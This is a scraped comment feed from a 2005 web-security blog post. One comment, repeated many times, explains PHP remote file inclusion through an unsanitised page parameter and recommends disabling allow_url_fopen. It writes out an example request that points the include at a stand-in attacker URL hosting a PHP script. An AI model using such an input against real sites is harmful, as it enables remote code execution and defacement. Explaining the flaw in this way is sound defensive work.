Comments on: Lessons in Web Security: PHP and Remote File Execution

Comments on: Lessons in Web Security: PHP and Remote File Execution http://technosailor.com/2005/02/02/lessons-in-web-security-php-and-remote-file-execution/ Web Technology and Real Life Merge Sat, 06 Mar 2010 03:27:38 +0000 hourly 1 http://wordpress.org/?v=3.0-alpha By: Robert Mathews http://technosailor.com/2005/02/02/lessons-in-web-security-php-and-remote-file-execution/comment-page-1/#comment-236069 Robert Mathews Wed, 07 Sep 2005 23:21:52 +0000 http://www.technosailor.com/?p=397#comment-236069 Here's a simple example of why allow_url_fopen is a problem in the real world.<br /><br><br /><br>I've seen several cases where people wrote a PHP script designed to display a bunch of content on a page with a fixed header and footer. They write it something like this:<br /><br><br /><br><br /><br><br /><br>And then they run it with something like "http://www.example.com/index.php?page=page5.html".<br /><br><br /><br>All it takes is someone to come along and type "http://www.example.com/index.php?page=http://evildoer.com/evilscript.txt", and if allow_url_fopen is turned on, PHP will happily run any PHP code contained in evilscript.txt. It could delete all your files, deface your site, attack other servers... whatever.<br /><br><br /><br>Moral: allow_url_fopen should *always* be off unless you need it.<br /><br><br /><br>Rob Here’s a simple example of why allow_url_fopen is a problem in the real world.

I’ve seen several cases where people wrote a PHP script designed to display a bunch of content on a page with a fixed header and footer. They write it something like this:

And then they run it with something like “http://www.example.com/index.php?page=page5.html”.

All it takes is someone to come along and type “http://www.example.com/index.php?page=http://evildoer.com/evilscript.txt”, and if allow_url_fopen is turned on, PHP will happily run any PHP code contained in evilscript.txt. It could delete all your files, deface your site, attack other servers… whatever.

Moral: allow_url_fopen should *always* be off unless you need it.

Rob

]]> By: Robert Mathews http://technosailor.com/2005/02/02/lessons-in-web-security-php-and-remote-file-execution/comment-page-1/#comment-230978 Robert Mathews Wed, 07 Sep 2005 23:21:52 +0000 http://www.technosailor.com/?p=397#comment-230978 Here's a simple example of why allow_url_fopen is a problem in the real world.<br /><br><br /><br>I've seen several cases where people wrote a PHP script designed to display a bunch of content on a page with a fixed header and footer. They write it something like this:<br /><br><br /><br><br /><br><br /><br>And then they run it with something like "http://www.example.com/index.php?page=page5.html".<br /><br><br /><br>All it takes is someone to come along and type "http://www.example.com/index.php?page=http://evildoer.com/evilscript.txt", and if allow_url_fopen is turned on, PHP will happily run any PHP code contained in evilscript.txt. It could delete all your files, deface your site, attack other servers... whatever.<br /><br><br /><br>Moral: allow_url_fopen should *always* be off unless you need it.<br /><br><br /><br>Rob Here’s a simple example of why allow_url_fopen is a problem in the real world.

I’ve seen several cases where people wrote a PHP script designed to display a bunch of content on a page with a fixed header and footer. They write it something like this:

And then they run it with something like “http://www.example.com/index.php?page=page5.html”.

All it takes is someone to come along and type “http://www.example.com/index.php?page=http://evildoer.com/evilscript.txt”, and if allow_url_fopen is turned on, PHP will happily run any PHP code contained in evilscript.txt. It could delete all your files, deface your site, attack other servers… whatever.

Moral: allow_url_fopen should *always* be off unless you need it.

Rob

]]> By: Robert Mathews http://technosailor.com/2005/02/02/lessons-in-web-security-php-and-remote-file-execution/comment-page-1/#comment-238425 Robert Mathews Wed, 07 Sep 2005 23:21:52 +0000 http://www.technosailor.com/?p=397#comment-238425 Here's a simple example of why allow_url_fopen is a problem in the real world.<br /><br><br /><br>I've seen several cases where people wrote a PHP script designed to display a bunch of content on a page with a fixed header and footer. They write it something like this:<br /><br><br /><br><br /><br><br /><br>And then they run it with something like "http://www.example.com/index.php?page=page5.html".<br /><br><br /><br>All it takes is someone to come along and type "http://www.example.com/index.php?page=http://evildoer.com/evilscript.txt", and if allow_url_fopen is turned on, PHP will happily run any PHP code contained in evilscript.txt. It could delete all your files, deface your site, attack other servers... whatever.<br /><br><br /><br>Moral: allow_url_fopen should *always* be off unless you need it.<br /><br><br /><br>Rob Here’s a simple example of why allow_url_fopen is a problem in the real world.

I’ve seen several cases where people wrote a PHP script designed to display a bunch of content on a page with a fixed header and footer. They write it something like this:

And then they run it with something like “http://www.example.com/index.php?page=page5.html”.

All it takes is someone to come along and type “http://www.example.com/index.php?page=http://evildoer.com/evilscript.txt”, and if allow_url_fopen is turned on, PHP will happily run any PHP code contained in evilscript.txt. It could delete all your files, deface your site, attack other servers… whatever.

Moral: allow_url_fopen should *always* be off unless you need it.

Rob

]]> By: Robert Mathews http://technosailor.com/2005/02/02/lessons-in-web-security-php-and-remote-file-execution/comment-page-1/#comment-233854 Robert Mathews Wed, 07 Sep 2005 23:21:52 +0000 http://www.technosailor.com/?p=397#comment-233854 Here's a simple example of why allow_url_fopen is a problem in the real world.<br /><br><br /><br>I've seen several cases where people wrote a PHP script designed to display a bunch of content on a page with a fixed header and footer. They write it something like this:<br /><br><br /><br><br /><br><br /><br>And then they run it with something like "http://www.example.com/index.php?page=page5.html".<br /><br><br /><br>All it takes is someone to come along and type "http://www.example.com/index.php?page=http://evildoer.com/evilscript.txt", and if allow_url_fopen is turned on, PHP will happily run any PHP code contained in evilscript.txt. It could delete all your files, deface your site, attack other servers... whatever.<br /><br><br /><br>Moral: allow_url_fopen should *always* be off unless you need it.<br /><br><br /><br>Rob Here’s a simple example of why allow_url_fopen is a problem in the real world.

I’ve seen several cases where people wrote a PHP script designed to display a bunch of content on a page with a fixed header and footer. They write it something like this:

And then they run it with something like “http://www.example.com/index.php?page=page5.html”.

All it takes is someone to come along and type “http://www.example.com/index.php?page=http://evildoer.com/evilscript.txt”, and if allow_url_fopen is turned on, PHP will happily run any PHP code contained in evilscript.txt. It could delete all your files, deface your site, attack other servers… whatever.

Moral: allow_url_fopen should *always* be off unless you need it.

Rob

]]> By: Robert Mathews http://technosailor.com/2005/02/02/lessons-in-web-security-php-and-remote-file-execution/comment-page-1/#comment-241056 Robert Mathews Wed, 07 Sep 2005 23:21:52 +0000 http://www.technosailor.com/?p=397#comment-241056 Here's a simple example of why allow_url_fopen is a problem in the real world.<br /><br><br /><br>I've seen several cases where people wrote a PHP script designed to display a bunch of content on a page with a fixed header and footer. They write it something like this:<br /><br><br /><br><br /><br><br /><br>And then they run it with something like "http://www.example.com/index.php?page=page5.html".<br /><br><br /><br>All it takes is someone to come along and type "http://www.example.com/index.php?page=http://evildoer.com/evilscript.txt", and if allow_url_fopen is turned on, PHP will happily run any PHP code contained in evilscript.txt. It could delete all your files, deface your site, attack other servers... whatever.<br /><br><br /><br>Moral: allow_url_fopen should *always* be off unless you need it.<br /><br><br /><br>Rob Here’s a simple example of why allow_url_fopen is a problem in the real world.

I’ve seen several cases where people wrote a PHP script designed to display a bunch of content on a page with a fixed header and footer. They write it something like this:

And then they run it with something like “http://www.example.com/index.php?page=page5.html”.

All it takes is someone to come along and type “http://www.example.com/index.php?page=http://evildoer.com/evilscript.txt”, and if allow_url_fopen is turned on, PHP will happily run any PHP code contained in evilscript.txt. It could delete all your files, deface your site, attack other servers… whatever.

Moral: allow_url_fopen should *always* be off unless you need it.

Rob

]]> By: Robert Mathews http://technosailor.com/2005/02/02/lessons-in-web-security-php-and-remote-file-execution/comment-page-1/#comment-240805 Robert Mathews Wed, 07 Sep 2005 23:21:52 +0000 http://www.technosailor.com/?p=397#comment-240805 Here's a simple example of why allow_url_fopen is a problem in the real world.<br /><br><br /><br>I've seen several cases where people wrote a PHP script designed to display a bunch of content on a page with a fixed header and footer. They write it something like this:<br /><br><br /><br><br /><br><br /><br>And then they run it with something like "http://www.example.com/index.php?page=page5.html".<br /><br><br /><br>All it takes is someone to come along and type "http://www.example.com/index.php?page=http://evildoer.com/evilscript.txt", and if allow_url_fopen is turned on, PHP will happily run any PHP code contained in evilscript.txt. It could delete all your files, deface your site, attack other servers... whatever.<br /><br><br /><br>Moral: allow_url_fopen should *always* be off unless you need it.<br /><br><br /><br>Rob Here’s a simple example of why allow_url_fopen is a problem in the real world.

I’ve seen several cases where people wrote a PHP script designed to display a bunch of content on a page with a fixed header and footer. They write it something like this:

And then they run it with something like “http://www.example.com/index.php?page=page5.html”.

All it takes is someone to come along and type “http://www.example.com/index.php?page=http://evildoer.com/evilscript.txt”, and if allow_url_fopen is turned on, PHP will happily run any PHP code contained in evilscript.txt. It could delete all your files, deface your site, attack other servers… whatever.

Moral: allow_url_fopen should *always* be off unless you need it.

Rob

]]> By: Robert Mathews http://technosailor.com/2005/02/02/lessons-in-web-security-php-and-remote-file-execution/comment-page-1/#comment-243660 Robert Mathews Wed, 07 Sep 2005 23:21:52 +0000 http://www.technosailor.com/?p=397#comment-243660 Here's a simple example of why allow_url_fopen is a problem in the real world.<br /><br><br /><br>I've seen several cases where people wrote a PHP script designed to display a bunch of content on a page with a fixed header and footer. They write it something like this:<br /><br><br /><br><br /><br><br /><br>And then they run it with something like "http://www.example.com/index.php?page=page5.html".<br /><br><br /><br>All it takes is someone to come along and type "http://www.example.com/index.php?page=http://evildoer.com/evilscript.txt", and if allow_url_fopen is turned on, PHP will happily run any PHP code contained in evilscript.txt. It could delete all your files, deface your site, attack other servers... whatever.<br /><br><br /><br>Moral: allow_url_fopen should *always* be off unless you need it.<br /><br><br /><br>Rob Here’s a simple example of why allow_url_fopen is a problem in the real world.

I’ve seen several cases where people wrote a PHP script designed to display a bunch of content on a page with a fixed header and footer. They write it something like this:

And then they run it with something like “http://www.example.com/index.php?page=page5.html”.

All it takes is someone to come along and type “http://www.example.com/index.php?page=http://evildoer.com/evilscript.txt”, and if allow_url_fopen is turned on, PHP will happily run any PHP code contained in evilscript.txt. It could delete all your files, deface your site, attack other servers… whatever.

Moral: allow_url_fopen should *always* be off unless you need it.

Rob

]]> By: Robert Mathews http://technosailor.com/2005/02/02/lessons-in-web-security-php-and-remote-file-execution/comment-page-1/#comment-243665 Robert Mathews Wed, 07 Sep 2005 23:21:52 +0000 http://www.technosailor.com/?p=397#comment-243665 Here's a simple example of why allow_url_fopen is a problem in the real world.<br /><br><br /><br>I've seen several cases where people wrote a PHP script designed to display a bunch of content on a page with a fixed header and footer. They write it something like this:<br /><br><br /><br><br /><br><br /><br>And then they run it with something like "http://www.example.com/index.php?page=page5.html".<br /><br><br /><br>All it takes is someone to come along and type "http://www.example.com/index.php?page=http://evildoer.com/evilscript.txt", and if allow_url_fopen is turned on, PHP will happily run any PHP code contained in evilscript.txt. It could delete all your files, deface your site, attack other servers... whatever.<br /><br><br /><br>Moral: allow_url_fopen should *always* be off unless you need it.<br /><br><br /><br>Rob Here’s a simple example of why allow_url_fopen is a problem in the real world.

I’ve seen several cases where people wrote a PHP script designed to display a bunch of content on a page with a fixed header and footer. They write it something like this:

And then they run it with something like “http://www.example.com/index.php?page=page5.html”.

All it takes is someone to come along and type “http://www.example.com/index.php?page=http://evildoer.com/evilscript.txt”, and if allow_url_fopen is turned on, PHP will happily run any PHP code contained in evilscript.txt. It could delete all your files, deface your site, attack other servers… whatever.

Moral: allow_url_fopen should *always* be off unless you need it.

Rob

]]> By: Robert Mathews http://technosailor.com/2005/02/02/lessons-in-web-security-php-and-remote-file-execution/comment-page-1/#comment-1007 Robert Mathews Wed, 07 Sep 2005 22:21:52 +0000 http://www.technosailor.com/?p=397#comment-1007 Here's a simple example of why allow_url_fopen is a problem in the real world.<br /> <br /> I've seen several cases where people wrote a PHP script designed to display a bunch of content on a page with a fixed header and footer. They write it something like this:<br /> <br /> <br /> <br /> And then they run it with something like "http://www.example.com/index.php?page=page5.html".<br /> <br /> All it takes is someone to come along and type "http://www.example.com/index.php?page=http://evildoer.com/evilscript.txt", and if allow_url_fopen is turned on, PHP will happily run any PHP code contained in evilscript.txt. It could delete all your files, deface your site, attack other servers... whatever.<br /> <br /> Moral: allow_url_fopen should *always* be off unless you need it.<br /> <br /> Rob Here’s a simple example of why allow_url_fopen is a problem in the real world.

I’ve seen several cases where people wrote a PHP script designed to display a bunch of content on a page with a fixed header and footer. They write it something like this:

And then they run it with something like “http://www.example.com/index.php?page=page5.html”.

All it takes is someone to come along and type “http://www.example.com/index.php?page=http://evildoer.com/evilscript.txt”, and if allow_url_fopen is turned on, PHP will happily run any PHP code contained in evilscript.txt. It could delete all your files, deface your site, attack other servers… whatever.

Moral: allow_url_fopen should *always* be off unless you need it.

Rob

]]> By: Aaron http://technosailor.com/2005/02/02/lessons-in-web-security-php-and-remote-file-execution/comment-page-1/#comment-236068 Aaron Thu, 03 Feb 2005 14:30:48 +0000 http://www.technosailor.com/?p=397#comment-236068 Hey Matt,<br /><br>Checking $_SERVER[Ã¢â‚¬â„¢DOCUMENT_ROOTÃ¢â‚¬â„¢] will not work because that global variable will be set according to the page doing the including, not the remote file itself. And yes, FTP will be a topic. :)<br /><br><br /><br>Leave a Comment Hey Matt,

Checking $_SERVER[Ã¢â‚¬â„¢DOCUMENT_ROOTÃ¢â‚¬â„¢] will not work because that global variable will be set according to the page doing the including, not the remote file itself. And yes, FTP will be a topic. :)

Leave a Comment

]]>